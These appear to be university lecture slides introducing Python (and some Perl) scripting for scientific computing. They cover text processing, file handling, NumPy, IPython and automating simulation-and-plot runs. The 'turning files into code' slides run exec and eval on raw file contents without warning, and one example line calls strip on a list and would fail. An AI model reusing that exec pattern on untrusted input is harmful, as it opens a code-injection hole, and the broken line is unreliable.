Lectures in INF3330: Problem Solving with High-Level Languages


Hans Petter Langtangen

Last updated: August 2007
PDF version (8 slides per page)

Contents

About this course

Intro to Python programmingFrequently encountered tasks in PythonPython modulesDoc stringsNumerical PythonRegular expressionsClass programming in PythonSimple GUI programming with PythonWidget tourMore advanced GUI programmingSimple CGI programming in PythonBasic Bash programmingIntro to Perl programmingFrequently encountered tasks in PerlSoftware engineering





About this course




What is a script?

Very high-level, often short, program
written in a high-level scripting language
Scripting languages: Unix shells, Tcl, Perl, Python, Ruby, Scheme, Rexx, JavaScript, VisualBasic, ...
This course: Python
+ a taste of Perl and Bash (Unix shell)



Characteristics of a script

Glue other programs together
Extensive text processing
File and directory manipulation
Often special-purpose code
Many small interacting scripts may yield a big system
Perhaps a special-purpose GUI on top
Portable across Unix, Windows, Mac
Interpreted program (no compilation+linking)



Why not stick to Java or C/C++?

Features of Perl and Python compared with Java, C/C++ and Fortran:

shorter, more high-level programs
much faster software development
more convenient programming
you feel more productive
Two main reasons:

no variable declarations,
but lots of consistency checks at run time
lots of standardized libraries and tools



Scripts yield short code (1)

Consider reading real numbers from a file, where each line can contain an arbitrary number of real numbers:
1.1  9   5.2
1.762543E-02
0 0.01 0.001

9 3 7
Python solution:
F = open(filename, 'r')
n = F.read().split()



Scripts yield short code (2)

Perl solution:
open F, $filename; 
$s = join "", <F>; 
@n = split ' ', $s;
Doing this in C++ or Java requires at least a loop, and in Fortran and C quite some code lines are necessary



Using regular expressions (1)

Suppose we want to read complex numbers written as text
(-3, 1.4)  or  (-1.437625E-9, 7.11)  or  (  4, 2 )
Python solution:
m = re.search(r'\(\s*([^,]+)\s*,\s*([^,]+)\s*\)', 
              '(-3,1.4)')
re, im = [float(x) for x in m.groups()]
Perl solution:
$s="(-3, 1.4)"; 
($re,$im)= $s=~ /\(\s*([^,]+)\s*,\s*([^,]+)\s*\)/;



Using regular expressions (2)

Regular expressions like
\(\s*([^,]+)\s*,\s*([^,]+)\s*\)
constitute a powerful language for specifying text patterns
Doing the same thing, without regular expressions, in Fortran and C requires quite some low-level code at the character array level
Remark: we could read pairs (-3, 1.4) without using regular expressions,
s = '(-3,  1.4 )'
re, im = s[1:-1].split(',')



Script variables are not declared

Example of a Python function:
def debug(leading_text, variable):
    if os.environ.get('MYDEBUG', '0') == '1':
        print leading_text, variable
Dumps any printable variable
(number, list, hash, heterogeneous structure)
Printing can be turned on/off by setting the environment variable MYDEBUG



The same function in C++

Templates can be used to mimic dynamically typed languages
Not as quick and convenient programming:
template <class T>
void debug(std::ostream& o, 
           const std::string& leading_text, 
           const T& variable)
{ 
  char* c = getenv("MYDEBUG");
  bool defined = false;
  if (c != NULL) {  // if MYDEBUG is defined ...
    if (std::string(c) == "1") {  // if MYDEBUG is true ...
      defined = true;
    }
  }
  if (defined) {
    o <<  leading_text << " " << variable << std::endl; 
  }
}



The relation to OOP

Object-oriented programming can also be used to parameterize types
Introduce base class A and a range of subclasses, all with a (virtual) print function
Let debug work with var as an A reference
Now debug works for all subclasses of A
Advantage: complete control of the legal variable types that debug are allowed to print (may be important in big systems to ensure that a function can allow make transactions with certain objects)
Disadvantage: much more work, much more code, less reuse of debug in new occasions



Flexible function interfaces

User-friendly environments (Matlab, Maple, Mathematica, S-Plus, ...) allow flexible function interfaces
Novice user:
# f is some data
plot(f)
More control of the plot:
plot(f, label='f', xrange=[0,10])
More fine-tuning:
plot(f, label='f', xrange=[0,10], title='f demo',
     linetype='dashed', linecolor='red')



Keyword arguments

Keyword arguments = function arguments with keywords and default values, e.g.,
def plot(data, label='', xrange=None, title='',
         linetype='solid', linecolor='black', ...)
The sequence and number of arguments in the call can be chosen by the user



Testing a variable's type

Inside the function one can test on the type of argument provided by the user
xrange can be left out (value None), or given as a 2-element list (xmin/xmax), or given as a string 'xmin:xmax', or given as a single number (meaning 0:number) etc.
if xrange is not None:  # i.e. xrange is specified by the user
    if isinstance(xrange, list):      # list [xmin,xmax] ?
        xmin = xrange[0];  xmax = xrange[1]
    elif isinstance(xrange, str):     # string 'xmin:xmax' ?
        xmin, xmax = re.search(r'(.*):(.*)',xrange).groups()
    elif isinstance(xrange, float):   # just a float?
        xmin = 0;  xmax = xrange



Classification of languages (1)

Many criteria can be used to classify computer languages
Dynamically vs statically typed languages
Python (dynamic):
c = 1            # c is an integer
c = [1,2,3]      # c is a list
C (static):
double c; c = 5.2;   # c can only hold doubles
c = "a string..."    # compiler error



Classification of languages (2)

Weakly vs strongly typed languages
Perl (weak):
$b = '1.2'
$c = 5*$b;   # implicit type conversion: '1.2' -> 1.2
Python (strong):
b = '1.2'
c = 5*b      # illegal; no implicit type conversion



Classification of languages (3)

Interpreted vs compiled languages
Dynamically vs statically typed (or type-safe) languages
High-level vs low-level languages (Python-C)
Very high-level vs high-level languages (Python-C)
Scripting vs system languages



Turning files into code (1)

Code can be constructed and executed at run-time
Consider an input file with the syntax
a = 1.2
no of iterations = 100
solution strategy = 'implicit'
c1 = 0
c2 = 0.1
A = 4
c3 = StringFunction('A*sin(x)')
How can we read this file and define variables a, no_of_iterations, solution_strategi, c1, c2, A with the specified values?
And can we make c3 a function c3(x) as specified?
Yes!



Turning files into code (2)

The answer lies in this short and generic code:
file = open('inputfile.dat', 'r')
for line in file:
    # first replace blanks on the left-hand side of = by _
    variable, value = line.split('=').strip()
    variable = re.sub(' ', '_', variable)
    exec(variable + '=' + value)   # magic...
This cannot be done in Fortran, C, C++ or Java!



Turning files into code; more advanced example

Here is a similar input file but with some additional difficulties (strings without quotes and verbose function expressions as values):
set heat conduction = 5.0
set dt = 0.1
set rootfinder = bisection
set source = V*exp(-q*t) is function of (t) with V=0.1, q=1
set bc = sin(x)*sin(y)*exp(-0.1*t) is function of (x,y,t)
Can we read such files and define variables and functions?
(here heat_conduction, dt and rootfinder, with the specified values, and source and bc as functions)
Yes! It is non-trivial and requires some advanced Python



Implementation (1)

# target line:
# set some name of variable = some value
from py4cs import misc

def parse_file(somefile):
    namespace = {}    # holds all new created variables
    line_re = re.compile(r'set (.*?)=(.*)$')
    for line in somefile:
        m = line_re.search(line)
        if m:
            variable = m.group(1).strip()
            value = m.group(2).strip()
            # test if value is a StringFunction specification:
            if value.find('is function of') >= 0:
                # interpret function specification:
                value = eval(string_function_parser(value))
            else:
                value = misc.str2obj(value)  # string -> object
            # space in variables names is illegal
            variable = variable.replace(' ', '_')
            code = 'namespace["%s"] = value' % variable
            exec code
    return namespace



Implementation (2)

# target line (with parameters A and q):
# expression is a function of (x,y) with A=1, q=2
# or (no parameters)
# expression is a function of (t)

def string_function_parser(text):
    m = re.search(r'(.*) is function of \((.*)\)( with .+)?', text)
    if m:
        expr = m.group(1).strip();  args = m.group(2).strip()
        # the 3rd group is optional:
        prms = m.group(3)
        if prms is None:  # the 3rd group is optional
            prms = ''     # works fine below
        else:
            prms = ''.join(prms.split()[1:])  # strip off 'with'

        # quote arguments:
        args = ', '.join(["'%s'" % v for v in args.split(',')])
        if args.find(',') < 0:  # single argument?
            args = args + ','   # add comma in tuple
        args = '(' + args + ')' # tuple needs parenthesis
            
        s = "StringFunction('%s', independent_variables=%s, %s)" % \
            (expr, args, prms)
        return s



GUI programming made simple

Python has interfaces to many GUI libraries
(Gtk, Qt, MFC, java.awt, java.swing, wxWindows, Tk)
The simplest library to use: Tk
Python + Tk = rapid GUI development
Wrap your scripts with a GUI in half a day
Easy for others to use your tools
Indispensible for demos
Quite complicated GUIs can also be made with Tk (and extensions)



GUI: Python vs C

Make a window on the screen with the text 'Hello World'
C + X11: 176 lines of ugly code
Python + Tk: 6 lines of readable code
#!/usr/bin/env python
from Tkinter import *
root = Tk()
Label(root, text='Hello, World!',
      foreground="white", background="black").pack()
root.mainloop()
Java and C++ codes are longer than Python + Tk



Web GUI

Many applications need a GUI accessible through a Web page
Perl and Python have extensive support for writing (server-side) dynamic Web pages (CGI scripts)
Perl and Python are central tools in the e-commerce explosion
Leading tools such as Plone and Zope (for dynamic web sites) are Python based



Tcl vs. C++; example (1)

Database application

C++ version implemented first
Tcl version had more functionality
C++ version: 2 months
Tcl version: 1 day
Effort ratio: 60
From a paper by John Ousterhout (the father of Tcl/Tk): 'Scripting: Higher-Level Programming for the 21st Century'



Tcl vs. C++; example (2)

Database library

C++ version implemented first
C++ version: 2-3 months
Tcl version: 1 week
Effort ratio: 8-12



Tcl vs. C; example

Display oil well production curves

Tcl version implemented first
C version: 3 months
Tcl version: 2 weeks
Effort ratio: 6



Tcl vs. Java; example

Simulator and GUI

Tcl version implemented first
Tcl version had somewhat more functionality
Java version: 3400 lines, 3-4 weeks
Tcl version: 1600 lines, 1 week
Effort ratio: 3-4



Scripts can be slow

Perl and Python scripts are first compiled to byte-code
The byte-code is then interpreted
Text processing is usually as fast as in C
Loops over large data structures might be very slow
for i in range(len(A)):
    A[i] = ...
Fortran, C and C++ compilers are good at optimizing such loops at compile time and produce very efficient assembly code (e.g. 100 times faster)
Fortunately, long loops in scripts can easily be migrated to Fortran or C



Scripts may be fast enough (1)

Read 100 000 (x,y) data from file and
write (x,f(y)) out again

Pure Python: 4s
Pure Perl: 3s
Pure Tcl: 11s
Pure C (fscanf/fprintf): 1s
Pure C++ (iostream): 3.6s
Pure C++ (buffered streams): 2.5s
Numerical Python modules: 2.2s (!)
Remark: in practice, 100 000 data points are written and read in binary format, resulting in much smaller differences



Scripts may be fast enough (2)

Read a text in a human language and generate random nonsense text in that language (from "The Practice of Programming" by B. W. Kernighan and R. Pike, 1999):
Language           CPU-time         lines of code

C               |    0.30         |      150
Java            |    9.2          |      105
C++ (STL-deque) |   11.2          |       70
C++ (STL-list)  |    1.5          |       70
Awk             |    2.1          |       20
Perl            |    1.0          |       18
Machine: Pentium II running Windows NT



When scripting is convenient (1)

The application's main task is to connect together existing components
The application includes a graphical user interface
The application performs extensive string/text manipulation
The design of the application code is expected to change significantly
CPU-time intensive parts can be migrated to C/C++ or Fortran



When scripting is convenient (2)

The application can be made short if it operates heavily on list or hash structures
The application is supposed to communicate with Web servers
The application should run without modifications on Unix, Windows, and Macintosh computers, also when a GUI is included



When to use C, C++, Java, Fortran

Does the application implement complicated algorithms and data structures?
Does the application manipulate large datasets so that execution speed is critical?
Are the application's functions well-defined and changing slowly?
Will type-safe languages be an advantage, e.g., in large development teams?



Some personal applications of scripting

Get the power of Unix also in non-Unix environments
Automate manual interaction with the computer
Customize your own working environment and become more efficient
Increase the reliability of your work
(what you did is documented in the script)
Have more fun!



Some business applications of scripting

Perl and Python are very popular in the open source movement and Linux environments
Perl and Python are widely used for creating Web services and administering computer systems
Perl and Python (and Tcl) replace 'home-made' (application-specific) scripting interfaces
Many companies want candidates with Perl/Python experience



What about mission-critical operations?

Scripting languages are free
What about companies that do mission-critical operations?
Can we use Perl or Python when sending a man to Mars?
Who is responsible for the quality of products like Perl and Python?



The reliability of scripting tools

Scripting languages are developed as a world-wide collaboration of volunteers (open source model)
The open source community as a whole is responsible for the quality
There is a single source for Perl and for Python
This source is read, tested and controlled by a very large number of people (and experts)
The reliability of large open source projects like Linux, Perl, and Python appears to be very good - at least as good as commercial software



This course

Scripting in general, but with most examples taken from scientific computing
Aimed at novice scripters
Flavor of lectures: 'getting started'
Jump into useful scripts and dissect the code
Learn more by programming
Find examples, look up man pages, Web docs and textbooks on demand
Get the overview
Customize existing code
Have fun and work with useful things



Practical problem solving

Problem: you are not an expert (yet)
Where to find detailed info, and how to understand it?
The efficient programmer navigates quickly in the jungle of textbooks, man pages, README files, source code examples, Web sites, news groups, ... and has a gut feeling for what to look for
The aim of the course is to improve your practical problem-solving abilities
You think you know when you learn, are more sure when you can write, even more when you can teach, but certain when you can program (Alan Perlis)



Contents of the course

Dissection of complete introductory scripts
Lists of common tasks (recipes!)
Regular expressions and text processing
CGI programming (dynamic Web pages)
GUI programming with Python
Creating effective working environments
Combining Python with C/C++ or Fortran
Software engineering
(documentation, modules, version control)
%



Why Perl AND Python?





Intro to Python programming




Make sure you have the software

You will need Python in recent versions (at least v2.2)
Several add-on modules are needed later on in the slides
Here is a list of software needed for the Python part:
http://folk.uio.no/hpl/scripting/softwarelist.html



Material associated with these slides

These slides have a companion book:
Scripting in Computational Science, 2nd edition,
Texts in Computational Science and Engineering,
Springer, 2006
Currentlly, we are working on the 3rd edition
All examples can be downloaded as a tarfile
http://folk.uio.no/hpl/scripting/scripting-src.tar.gz



Installing scripting-src.tar.gz

Pack scripting-src.tar.gz out in a directory and let scripting be an environment variable pointing to the top directory:
tar xvzf scripting-src.tar.gz
export scripting=`pwd`
All paths in these slides are given relative to scripting, e.g., src/py/intro/hw.py is reached as
$scripting/src/py/intro/hw.py



Scientific Hello World script

All computer languages intros start with a program that prints "Hello, World!" to the screen
Scientific computing extension: add reading a number and computing its sine value
The script (hw.py) should be run like this:
python hw.py 3.4
or just (Unix)
./hw.py 3.4
Output:
Hello, World! sin(3.4)=-0.255541102027



Purpose of this script

Demonstrate

how to read a command-line argument
how to call a math (sine) function
how to work with variables
how to print text and numbers



The code

File hw.py:
#!/usr/bin/env python

# load system and math module:
import sys, math       

# extract the 1st command-line argument:
r = float(sys.argv[1]) 

s = math.sin(r)

print "Hello, World! sin(" + str(r) + ")=" + str(s)
Make the file executable (on Unix):
chmod a+rx hw.py



Comments

The first line specifies the interpreter of the script
(here the first python program in your path)
python hw.py 1.4   # first line is not treated as comment
./hw.py 1.4        # first line is used to specify an interpreter
Even simple scripts must load modules:
import sys, math  
Numbers and strings are two different types:
r = sys.argv[1]         # r is string
s = math.sin(float(r))  

# sin expects number, not string r
# s becomes a floating-point number



Alternative print statements

Desired output:
Hello, World! sin(3.4)=-0.255541102027
String concatenation:
print "Hello, World! sin(" + str(r) + ")=" + str(s)
C printf-like statement:
print "Hello, World! sin(%g)=%g" % (r,s)
Variable interpolation:
print "Hello, World! sin(%(r)g)=%(s)g" % vars()



printf format strings

%d     : integer
%5d    : integer in a field of width 5 chars
%-5d   : integer in a field of width 5 chars,
         but adjusted to the left
%05d   : integer in a field of width 5 chars,
         padded with zeroes from the left
%g     : float variable in %f or %g notation
%e     : float variable in scientific notation
%11.3e : float variable in scientific notation,
         with 3 decimals, field of width 11 chars
%5.1f  : float variable in fixed decimal notation,
         with one decimal, field of width 5 chars
%.3f   : float variable in fixed decimal form,
         with three decimals, field of min. width
%s     : string
%-20s  : string in a field of width 20 chars,
         and adjusted to the left



Strings in Python

Single- and double-quoted strings work in the same way
s1 = "some string with a number %g" % r
s2 = 'some string with a number %g' % r  # = s1
Triple-quoted strings can be multi line with embedded newlines:
text = """
large portions of a text
can be conveniently placed
inside triple-quoted strings
(newlines are preserved)"""
Raw strings, where backslash is backslash:
s3 = r'\(\s+\.\d+\)'
# with ordinary string (must quote backslash):
s3 = '\\(\\s+\\.\\d+\\)'



Where to find Python info

Make a bookmark for \$scripting/doc.html
Follow link to Index to Python Library Reference
(complete on-line Python reference)
Click on Python keywords, modules etc.
Online alternative: pydoc, e.g., pydoc math
pydoc lists all classes and functions in a module
Alternative: Python in a Nutshell (or Beazley's textbook)
Recommendation: use these slides and associated book together with the Python Library Reference, and learn by doing exercises!



New example: reading/writing data files

Tasks:

Read (x,y) data from a two-column file
Transform y values to f(y)
Write (x,f(y)) to a new file
What to learn:

How to open, read, write and close files
How to write and call a function
How to work with arrays (lists)
File: src/py/intro/datatrans1.py



Reading input/output filenames

Usage:
./datatrans1.py infilename outfilename
Read the two command-line arguments:
input and output filenames
infilename  = sys.argv[1]
outfilename = sys.argv[2]
Command-line arguments are in sys.argv[1:]
sys.argv[0] is the name of the script



Exception handling

What if the user fails to provide two command-line arguments?
Python aborts execution with an informative error message
Manual handling of errors:
try:
    infilename  = sys.argv[1]
    outfilename = sys.argv[2]
except:
    # try block failed,
    # we miss two command-line arguments
    print 'Usage:', sys.argv[0], 'infile outfile'
    sys.exit(1)
This is the common way of dealing with errors in Python, called exception handling



Open file and read line by line

Open files:
ifile = open( infilename, 'r')  # r for reading
ofile = open(outfilename, 'w')  # w for writing

afile = open(appfilename, 'a')  # a for appending
Read line by line:
for line in ifile:
    # process line
Observe: blocks are indented; no braces!



Defining a function

import math

def myfunc(y):
    if y >= 0.0:  
        return y**5*math.exp(-y)
    else:         
        return 0.0


# alternative way of calling module functions
# (gives more math-like syntax in this example):

from math import *
def myfunc(y):
    if y >= 0.0:  
        return y**5*exp(-y)
    else:         
        return 0.0



Data transformation loop

Input file format: two columns with numbers
0.1   1.4397
0.2   4.325
0.5   9.0
Read (x,y), transform y, write (x,f(y)):
for line in ifile:
    pair = line.split()
    x = float(pair[0]); y = float(pair[1])
    fy = myfunc(y)  # transform y value
    ofile.write('%g  %12.5e\n' % (x,fy))



Alternative file reading

This construction is more flexible and traditional in Python (and a bit strange...):
while 1:
    line = ifile.readline()  # read a line
    if not line: break
    # process line
i.e., an 'infinite' loop with the termination criterion inside the loop



Loading data into lists

Read input file into list of lines:
lines = ifile.readlines()
Now the 1st line is lines[0], the 2nd is lines[1], etc.
Store x and y data in lists:
# go through each line, 
# split line into x and y columns

x = []; y = []   # store data pairs in lists x and y

for line in lines:
    xval, yval = line.split()
    x.append(float(xval))
    y.append(float(yval))
See src/py/intro/datatrans2.py for this version



Loop over list entries

For-loop in Python:
for i in range(start,stop,inc):
    ...
for j in range(stop):
    ...
generates
i = start, start+inc, start+2*inc, ..., stop-1
j = 0, 1, 2, ..., stop-1
Loop over (x,y) values:
ofile = open(outfilename, 'w') # open for writing

for i in range(len(x)):
    fy = myfunc(y[i])  # transform y value
    ofile.write('%g  %12.5e\n' % (x[i], fy))

ofile.close()



Running the script

Method 1: write just the name of the scriptfile:
./datatrans1.py infile outfile

# or
datatrans1.py infile outfile
if . (current working directory) or the directory containing datatrans1.py is in the path
Method 2: run an interpreter explicitly:
python datatrans1.py infile outfile
Use the first python program found in the path
This works on Windows too (method 1 requires the right assoc/ftype bindings for .py files)



More about headers

In method 1, the interpreter to be used is specified in the first line
Explicit path to the interpreter:
#!/usr/local/bin/python
or perhaps your own Python interpreter:
#!/home/hpl/projects/scripting/Linux/bin/python
Using env to find the first Python interpreter in the path:
#!/usr/bin/env python



Are scripts compiled?

Yes and no, depending on how you see it
Python first compiles the script into bytecode
The bytecode is then interpreted
No linking with libraries; libraries are imported dynamically when needed
It appears as there is no compilation
Quick development: just edit the script and run!
(no time-consuming compilation and linking)
Extensive error checking at run time



Python and error checking

Easy to introduce intricate bugs?

no declaration of variables
functions can "eat anything"
No, extensive consistency checks at run time replace the need for strong typing and compile-time checks
Example: sending a string to the sine function, math.sin('t'), triggers a run-time error (type incompatibility)
Example: try to open a non-existing file
./datatrans1.py qqq someoutfile
Traceback (most recent call last):
  File "./datatrans1.py", line 12, in ?
    ifile = open( infilename, 'r')
IOError:[Errno 2] No such file or directory:'qqq'



Computing with arrays

x and y in datatrans2.py are lists
We can compute with lists element by element (as shown)
However: using Numerical Python (NumPy) arrays instead of lists is much more efficient and convenient
Numerical Python is an extension of Python: a new fixed-size array type and lots of functions operating on such arrays



A first glimpse of NumPy

Import (more on this later...):
from py4cs.numpytools import *
x = sequence(0, 1, 0.001)  # 0.0, 0.001, 0.002, ..., 1.0
x = sin(x)                 # computes sin(x[0]), sin(x[1]) etc.
x=sin(x) is 13 times faster than an explicit loop:
for i in range(len(x)):
    x[i] = sin(x[i])
because sin(x) invokes an efficient loop in C



Loading file data into NumPy arrays

A special module loads tabular file data into NumPy arrays:
import py4cs.filetable
f = open(infilename, 'r')
x, y = py4cs.filetable.read_columns(f)
f.close()
Now we can compute with the NumPy arrays x and y:
from py4cs.numpytools import *  # import everything in NumPy
x = 10*x
y = 2*y + 0.1*sin(x)
We can easily write x and y back to a file:
f = open(outfilename, 'w')
py4cs.filetable.write_columns(f, x, y)
f.close()



More on computing with NumPy arrays

Multi-dimensional arrays can be constructed:
x = zeros(n, Float)  # array with indices 0,1,...,n-1
x = zeros((m,n), Float)    # two-dimensional array
x[i,j] = 1.0               # indexing
x = zeros((p,q,r), Float)  # three-dimensional array
x[i,j,k] = -2.1
x = sin(x)*cos(x)
We can plot one-dimensional arrays:
from py4cs.anyplot.gnuplot_ import *
x = sequence(0, 2, 0.1)
y = x + sin(10*x)
plot(x, y)
NumPy has lots of math functions and operations
SciPy is a comprehensive extension of NumPy
NumPy + SciPy is a kind of Matlab replacement for many people



Interactive Python

Python statements can be run interactively in a Python shell
The ``best'' shell is called IPython
Sample session with IPython:
Unix/DOS> ipython
...
In [1]:3*4-1
Out[1]:11

In [2]:from math import *

In [3]:x = 1.2

In [4]:y = sin(x)

In [5]:x
Out[5]:1.2

In [6]:y
Out[6]:0.93203908596722629



Editing capabilities in IPython

Up- and down-arrays: go through command history
Emacs key bindings for editing previous commands
The underscore variable holds the last output
In [6]:y
Out[6]:0.93203908596722629

In [7]:_ + 1
Out[7]:1.93203908596722629



TAB completion

IPython supports TAB completion: write a part of a command or name (variable, function, module), hit the TAB key, and IPython will complete the word or show different alternatives:
In [1]: import math

In [2]: math.<TABKEY>
math.__class__         math.__str__           math.frexp
math.__delattr__       math.acos              math.hypot
math.__dict__          math.asin              math.ldexp
...
or
In [2]: my_variable_with_a_very_long_name = True

In [3]: my<TABKEY>
In [3]: my_variable_with_a_very_long_name
You can increase your typing speed with TAB completion!



More examples

In [1]:f = open('datafile', 'r')

IOError: [Errno 2] No such file or directory: 'datafile'

In [2]:f = open('.datatrans_infile', 'r')

In [3]:from py4cs.filetable import read_columns

In [4]:x, y = read_columns(f)

In [5]:x
Out[5]:array([ 0.1,  0.2,  0.3,  0.4])

In [6]:y
Out[6]:array([ 1.1    ,  1.8    ,  2.22222,  1.8    ])



IPython and the Python debugger

Scripts can be run from IPython:
In [1]:run scriptfile arg1 arg2 ...
e.g.,
In [1]:run datatrans2.py .datatrans_infile tmp1
IPython is integrated with Python's pdb debugger
pdb can be automatically invoked when an exception occurs:
In [29]:%pdb on  # invoke pdb automatically
In [30]:run datatrans2.py infile tmp2



More on debugging

This happens when the infile name is wrong:
/home/work/scripting/src/py/intro/datatrans2.py
      7     print "Usage:",sys.argv[0], "infile outfile"; sys.exit(1)
      8
----> 9 ifile = open(infilename, 'r')  # open file for reading
     10 lines = ifile.readlines()      # read file into list of lines
     11 ifile.close()

IOError: [Errno 2] No such file or directory: 'infile'
> /home/work/scripting/src/py/intro/datatrans2.py(9)?()
-> ifile = open(infilename, 'r')  # open file for reading
(Pdb) print infilename
infile



On the efficiency of scripts

Consider datatrans1.py: read 100 000 (x,y) data from file and write (x,f(y)) out again

Pure Python: 4s
Pure Perl: 3s
Pure Tcl: 11s
Pure C (fscanf/fprintf): 1s
Pure C++ (iostream): 3.6s
Pure C++ (buffered streams): 2.5s
Numerical Python modules: 2.2s (!)
(Computer: IBM X30, 1.2 GHz, 512 Mb RAM, Linux, gcc 3.3)



Remarks

The results reflect general trends:

Perl is up to twice as fast as Python
Tcl is significantly slower than Python
C and C++ are not that faster
Special Python modules enable the speed of C/C++
Unfair test?
scripts use split on each line,
C/C++ reads numbers consecutively
100 000 data points would be stored in binary format in a real application, resulting in much smaller differences between the implementations



The classical script

Simple, classical Unix shell scripts are widely used to replace sequences of operating system commands
Typical application in numerical simulation:

run a simulation program
run a visualization program and produce graphs
Programs are supposed to run in batch
We want to make such a gluing script in Python



What to learn

Parsing command-line options:
 
somescript -option1 value1 -option2 value2
Removing and creating directories
Writing data to file
Running applications (stand-alone programs)



Simulation example

Code: oscillator (written in Fortran 77)



Usage of the simulation code

Input: m, b, c, and so on read from standard input
How to run the code:
oscillator < file
where file can be
3.0
0.04
1.0
...
(i.e., values of m, b, c, etc.)
Results (t, y(t)) in sim.dat



A plot of the solution



Plotting graphs in Gnuplot

Commands:
set title 'case: m=3 b=0.7 c=1 f(y)=y A=5 ...';

# screen plot: (x,y) data are in the file sim.dat
plot 'sim.dat' title 'y(t)' with lines;

# hardcopies:
set size ratio 0.3 1.5, 1.0;  
set term postscript eps mono dashed 'Times-Roman' 28;
set output 'case.ps';
plot 'sim.dat' title 'y(t)' with lines;

# make a plot in PNG format as well:
set term png small;
set output 'case.png';
plot 'sim.dat' title 'y(t)' with lines;
Commands can be given interactively or put in a file



Typical manual work

Change oscillating system parameters by editing the simulator input file
Run simulator:
oscillator < inputfile
Plot:
gnuplot -persist -geometry 800x200 case.gp
Plot annotations must be consistent with inputfile
Let's automate!



Deciding on the script's interface

Usage:
./simviz1.py -m 3.2 -b 0.9 -dt 0.01 -case run1
Sensible default values for all options
Put simulation and plot files in a subdirectory
(specified by -case run1)
File: src/py/intro/simviz1.py



The script's task

Set default values of m, b, c etc.
Parse command-line options (-m, -b etc.) and assign new values to m, b, c etc.
Create and move to subdirectory
Write input file for the simulator
Run simulator
Write Gnuplot commands in a file
Run Gnuplot



Parsing command-line options

Set default values of the script's input parameters:
m = 1.0; b = 0.7; c = 5.0; func = 'y'; A = 5.0; 
w = 2*math.pi; y0 = 0.2; tstop = 30.0; dt = 0.05; 
case = 'tmp1'; screenplot = 1
Examine command-line options in sys.argv:
# read variables from the command line, one by one:
while len(sys.argv) >= 2:
    option = sys.argv[1];       del sys.argv[1]
    if   option == '-m':
        m = float(sys.argv[1]); del sys.argv[1]
    ...
Note: sys.argv[1] is text, but we may want a float for numerical operations



Modules for parsing command-line arguments

Python offers two modules for command-line argument parsing: getopt and optparse
These accept short options (-m) and long options (--mass)
getopt examines the command line and returns pairs of options and values ((--mass, 2.3))
optparse is a bit more comprehensive to use and makes the command-line options available as attributes in an object
See exercises for extending simviz1.py with (e.g.) getopt
In this introductory example we rely on manual parsing since this exemplifies basic Python programming



Creating a subdirectory

Python has a rich cross-platform operating system (OS) interface
Skip Unix- or DOS-specific commands;
do all OS operations in Python!
Safe creation of a subdirectory:
dir = case              # subdirectory name
import os, shutil
if os.path.isdir(dir):  # does dir exist?
    shutil.rmtree(dir)  # yes, remove old files
os.mkdir(dir)           # make dir directory
os.chdir(dir)           # move to dir



Writing the input file to the simulator

f = open('%s.i' % case, 'w')
f.write("""
        %(m)g
        %(b)g
        %(c)g
        %(func)s
        %(A)g
        %(w)g
        %(y0)g
        %(tstop)g
        %(dt)g
        """ % vars())
f.close()
Note: triple-quoted string for multi-line output



Running the simulation

Stand-alone programs can be run as
os.system(command)

# examples:
os.system('myprog < input_file')
os.system('ls *')  # bad, Unix-specific
Better: get failure status and output from the command
cmd = 'oscillator < %s.i' % case  # command to run
import commands
failure, output = commands.getstatusoutput(cmd)
if failure:
    print 'running the oscillator code failed'
    print output
    sys.exit(1)



Making plots

Make Gnuplot script:
f = open(case + '.gnuplot', 'w')
f.write("""
set title '%s: m=%g b=%g c=%g f(y)=%s A=%g ...';
...
""" % (case,m,b,c,func,A,w,y0,dt,case,case))
...
f.close()
Run Gnuplot:
cmd = 'gnuplot -geometry 800x200 -persist ' \
      + case + '.gnuplot'
failure, output = commands.getstatusoutput(cmd)
if failure:
    print 'running gnuplot failed'; print output; sys.exit(1)



Python vs Unix shell script

Our simviz1.py script is traditionally written as a Unix shell script
What are the advantages of using Python here?

Easier command-line parsing
Runs on Windows and Mac as well as Unix
Easier extensions (loops, storing data in arrays etc)
Shell script file: src/bash/simviz1.sh



Other programs for curve plotting

It is easy to replace Gnuplot by another plotting program
Matlab, for instance:
f = open(case + '.m', 'w')  # write to Matlab M-file
# (the character % must be written as %% in printf-like strings)
f.write("""
load sim.dat              %% read sim.dat into sim matrix
plot(sim(:,1),sim(:,2))   %% plot 1st column as x, 2nd as y
legend('y(t)')
title('%s: m=%g b=%g c=%g f(y)=%s A=%g w=%g y0=%g dt=%g')
outfile = '%s.ps';  print('-dps',  outfile)  %% ps BW plot
outfile = '%s.png'; print('-dpng', outfile)  %% png color plot
""" % (case,m,b,c,func,A,w,y0,dt,case,case))
if screenplot: f.write('pause(30)\n')
f.write('exit\n'); f.close()

if screenplot:
    cmd = 'matlab -nodesktop -r ' + case + ' > /dev/null &'
else:
    cmd = 'matlab -nodisplay -nojvm -r ' + case
failure, output = commands.getstatusoutput(cmd)



Series of numerical experiments

Suppose we want to run a series of experiments with different m values
Put a script on top of simviz1.py,
./loop4simviz1.py m_min m_max dm \
                  [options as for simviz1.py]
having a loop over m and calling simviz1.py inside the loop
Each experiment is archived in a separate directory
That is, loop4simviz1.py controls the -m and -case options to simviz1.py



Handling command-line args (1)

The first three arguments define the m values:
try:
    m_min = float(sys.argv[1])
    m_max = float(sys.argv[2])
    dm    = float(sys.argv[3])
except:
    print 'Usage:',sys.argv[0],\
    'm_min m_max m_increment [ simviz1.py options ]'
    sys.exit(1)
Pass the rest of the arguments, sys.argv[4:], to simviz1.py
Problem: sys.argv[4:] is a list, we need a string
['-b','5','-c','1.1'] -> '-b 5 -c 1.1'



Handling command-line args (2)

' '.join(list) can make a string out of the list list, with a blank between each item
simviz1_options = ' '.join(sys.argv[4:])
Example:
./loop4simviz1.py 0.5 2 0.5 -b 2.1 -A  3.6
results in
m_min:  0.5
m_max:  2.0
dm:     0.5
simviz1_options = '-b 2.1 -A 3.6'



The loop over m

Cannot use
for m in range(m_min, m_max, dm):
because range works with integers only
A while-loop is appropriate:
m = m_min
while m <= m_max:
    case = 'tmp_m_%g' % m
    s = 'python simviz1.py %s -m %g -case %s' % \
        (simviz1_options,m,case)
    failure, output = commands.getstatusoutput(s)
    m += dm
(Note: our -m and -case will override any -m or -case option provided by the user)



Collecting plots in an HTML file

Many runs can be handled; need a way to browse the results
Idea: collect all plots in a common HTML file:
html = open('tmp_mruns.html', 'w')
html.write('<HTML><BODY BGCOLOR="white">\n')

m = m_min
while m <= m_max:
    case = 'tmp_m_%g' % m
    cmd = 'python simviz1.py %s -m %g -case %s' % \
          (simviz1_options, m, case)
    failure, output = commands.getstatusoutput(cmd)
